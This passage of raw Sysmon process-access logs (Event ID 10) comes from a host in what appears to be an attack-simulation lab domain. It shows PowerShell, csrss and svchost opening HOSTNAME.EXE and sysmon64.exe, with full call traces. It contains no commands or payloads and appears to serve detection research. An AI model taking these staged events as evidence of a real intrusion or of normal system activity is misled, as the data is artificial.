ativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","SourceProcessId":"1092","SourceThreadId":"4108","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001037C10800}","TargetProcessId":"932","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f56251(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f481d6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54709(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f542a5(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001037C10800}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001037C10800}","TargetProcessId":"932","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.760","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 